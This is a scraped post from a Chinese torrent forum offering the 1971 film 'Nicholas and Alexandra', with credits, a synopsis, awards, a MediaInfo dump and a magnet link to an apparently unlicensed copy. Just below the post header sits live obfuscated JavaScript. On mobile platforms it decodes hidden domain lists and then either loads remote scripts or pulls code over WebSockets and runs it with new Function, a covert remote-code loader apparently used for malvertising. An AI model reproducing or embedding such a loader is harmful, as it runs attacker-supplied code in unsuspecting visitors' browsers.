俄宫秘史[双语字幕]Nicholas.and.Alexandra.1971.1080p.BluRay.x264.DTS.1.0-迅雷下载 20.71GB

版主小s 1月前 716

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 俄宫秘史 / 宮廷秘史(台) / 江山美人 / 尼古拉斯与亚历山德拉
◎片  名 Nicholas and Alexandra
◎年  代 1971
◎产  地 英国
◎类  别 剧情 / 传记 / 历史 / 战争
◎语  言 英语
◎上映日期 1971-11-29
◎IMDb链接 https://www.imdb.com/title/tt0067483/
◎豆瓣评分 7.9/10 (369人评价)
◎豆瓣链接 https://movie.douban.com/subject/1295425/
◎片  长 183 分钟
◎导  演 富兰克林·沙夫纳 Franklin J. Schaffner (id:1018279)
◎编  剧 詹姆斯·高曼 James Goldman (id:1063601)
◎演  员 汤姆·贝克 Tom Baker (id:1060990)
       提摩西·韦斯特 Timothy West (id:1027954)
       埃里克·波特 Eric Porter (id:1131085)
       劳伦斯·奥利弗 Laurence Olivier (id:1053557)
       阿尼雅·马森 Ania Marson (id:1370690)
       林恩·弗雷德里克 Lynne Frederick (id:1022944)
       Candace Glendenning Candace Glendenning (id:1097784)
       约翰·伍德 John Wood (id:1301220)
       珍妮特·苏兹曼 Janet Suzman (id:1156168)
       Roderic Noble Roderic Noble (id:1128183)
       迈克尔·杰斯顿 Michael Jayston (id:1110428)
       艾琳·沃斯 Irene Worth (id:1168239)
       理查德·罗德尼·本尼特 Richard Rodney Bennett (id:1001160)
       伊冯·布雷克 Yvonne Blake (id:1278754)
       何塞·洛佩斯·罗德罗 José López Rodero (id:1290555)

◎标  签 俄罗斯 / 传记 / 历史 / 英国 / 宫廷 / 沙皇 / 英国电影 / 1971

◎简  介
  詹姆斯.高曼编剧的本片描述俄国最后一位沙皇尼古拉斯二世晚年的生平故事,从1904年开始描述至1918年俄国革命后他们全家被处决的经过。是一部气氛沉重的史诗式宫闱影片,故事有点单调沉闷。导演富兰克林.J.沙夫纳的手法比较庄重,出色的美术及服装设计使当年的俄宫景色得以在银幕上重现,迈克尔.杰斯顿等演员亦普遍出色,本片曾获最佳艺术指导、最佳服装设计两项金像奖。

◎获奖情况 (共6项)
  第44届奥斯卡金像奖 (1972)
  最佳影片(提名)
   └──萨姆·斯皮格尔 (id:1041774)
  最佳女主角(提名)
   └──珍妮特·苏兹曼 (id:1156168)
  最佳摄影(提名)
   └──弗雷迪·扬 (id:1028482)
  最佳艺术指导
  最佳服装设计
  剧情片最佳原创配乐(提名)
   └──理查德·罗德尼·本尼特 (id:1001160)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 63467763205657118339811951445475636497 (0x2FBF72522801F76E35559A9FAA9CB511)
  4. Complete name                            : [email protected]DQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 20.7 GiB
  8. Duration                                 : 3 h 8 min
  9. Overall bit rate                         : 15.7 Mb/s
  10. Movie name                               : Nicholas and Alexandra 1971
  11. Encoded date                             : UTC 2021-07-26 03:50:43
  12. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  14. Cover                                    : Yes
  15. Attachments                              : cover.jpg
  16. Video
  17. ID                                       : 1
  18. Format                                   : AVC
  19. Format/Info                              : Advanced Video Codec
  20. Format profile                           : [email protected]
  21. Format settings                          : CABAC / 4 Ref Frames
  22. Format settings, CABAC                   : Yes
  23. Format settings, Reference frames        : 4 frames
  24. Codec ID                                 : V_MPEG4/ISO/AVC
  25. Duration                                 : 3 h 8 min
  26. Bit rate                                 : 14.9 Mb/s
  27. Width                                    : 1 920 pixels
  28. Height                                   : 816 pixels
  29. Display aspect ratio                     : 2.35:1
  30. Frame rate mode                          : Constant
  31. Frame rate                               : 23.976 (24000/1001/53354) FPS
  32. Color space                              : YUV
  33. Chroma subsampling                       : 4:2:0
  34. Bit depth                                : 8 bits
  35. Scan type                                : Progressive
  36. Bits/(Pixel*Frame)                       : 0.396
  37. Stream size                              : 19.6 GiB (95%)
  38. Writing library                          : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]
  39. Encoding settings                        : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=25 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.6000 / qcomp=0.60 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.70 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0
  40. Default                                  : Yes
  41. Forced                                   : No
  42. Audio
  43. ID                                       : 2
  44. ID in the original source medium         : 4352 (0x1100)
  45. Format                                   : DTS
  46. Format/Info                              : Digital Theater Systems
  47. Codec ID                                 : A_DTS
  48. Duration                                 : 3 h 8 min
  49. Bit rate mode                            : Constant
  50. Bit rate                                 : 768 kb/s
  51. Channel(s)                               : 1 channel
  52. Channel layout                           : C
  53. Sampling rate                            : 48.0 kHz
  54. Frame rate                               : 93.750 FPS (512 SPF)
  55. Bit depth                                : 24 bits
  56. Compression mode                         : Lossy
  57. Stream size                              : 1.01 GiB (5%)
  58. Language                                 : English
  59. Default                                  : Yes
  60. Forced                                   : No
  61. Original source medium                   : Blu-ray
  62. Text #1
  63. ID                                       : 3
  64. ID in the original source medium         : 4609 (0x1201)
  65. Format                                   : PGS
  66. Muxing mode                              : zlib
  67. Codec ID                                 : S_HDMV/PGS
  68. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  69. Duration                                 : 3 h 0 min
  70. Bit rate                                 : 43.5 kb/s
  71. Count of elements                        : 4866
  72. Stream size                              : 56.2 MiB (0%)
  73. Title                                    : chs&eng
  74. Language                                 : Chinese
  75. Default                                  : Yes
  76. Forced                                   : No
  77. Original source medium                   : Blu-ray
  78. Text #2
  79. ID                                       : 4
  80. ID in the original source medium         : 4610 (0x1202)
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 3 h 0 min
  86. Bit rate                                 : 43.9 kb/s
  87. Count of elements                        : 4866
  88. Stream size                              : 56.7 MiB (0%)
  89. Title                                    : cht&eng
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Original source medium                   : Blu-ray
  94. Text #3
  95. ID                                       : 5
  96. ID in the original source medium         : 4611 (0x1203)
  97. Format                                   : PGS
  98. Muxing mode                              : zlib
  99. Codec ID                                 : S_HDMV/PGS
  100. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  101. Duration                                 : 3 h 0 min
  102. Bit rate                                 : 30.5 kb/s
  103. Count of elements                        : 4866
  104. Stream size                              : 39.5 MiB (0%)
  105. Title                                    : chs
  106. Language                                 : Chinese
  107. Default                                  : No
  108. Forced                                   : No
  109. Original source medium                   : Blu-ray
  110. Text #4
  111. ID                                       : 6
  112. ID in the original source medium         : 4612 (0x1204)
  113. Format                                   : PGS
  114. Muxing mode                              : zlib
  115. Codec ID                                 : S_HDMV/PGS
  116. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  117. Duration                                 : 3 h 0 min
  118. Bit rate                                 : 30.9 kb/s
  119. Count of elements                        : 4866
  120. Stream size                              : 40.0 MiB (0%)
  121. Title                                    : cht
  122. Language                                 : Chinese
  123. Default                                  : No
  124. Forced                                   : No
  125. Original source medium                   : Blu-ray
  126. Text #5
  127. ID                                       : 7
  128. ID in the original source medium         : 4608 (0x1200)
  129. Format                                   : PGS
  130. Muxing mode                              : zlib
  131. Codec ID                                 : S_HDMV/PGS
  132. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  133. Duration                                 : 3 h 4 min
  134. Bit rate                                 : 57.1 kb/s
  135. Count of elements                        : 4845
  136. Stream size                              : 75.2 MiB (0%)
  137. Language                                 : English
  138. Default                                  : No
  139. Forced                                   : No
  140. Original source medium                   : Blu-ray
  141. Menu
  142. 00:00:00.000                             : Chapter 01
  143. 00:13:47.868                             : Chapter 02
  144. 00:27:06.124                             : Chapter 03
  145. 00:33:59.037                             : Chapter 04
  146. 00:44:39.927                             : Chapter 05
  147. 00:55:53.600                             : Chapter 06
  148. 01:04:44.881                             : Chapter 07
  149. 01:17:07.205                             : Chapter 08
  150. 01:31:54.217                             : Chapter 09
  151. 01:45:41.209                             : Chapter 10
  152. 01:55:31.090                             : Chapter 11
  153. 02:08:54.351                             : Chapter 12
  154. 02:17:50.679                             : Chapter 13
  155. 02:31:21.864                             : Chapter 14
  156. 02:47:09.394                             : Chapter 15
  157. 03:06:57.456                             : Chapter 16


TAGS 剧情 历史 传记 战争

磁力链:
  • magnet:?xt=urn:btih:B8200D062C7B1EEB701A04024B3BE547DC95CFBC
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回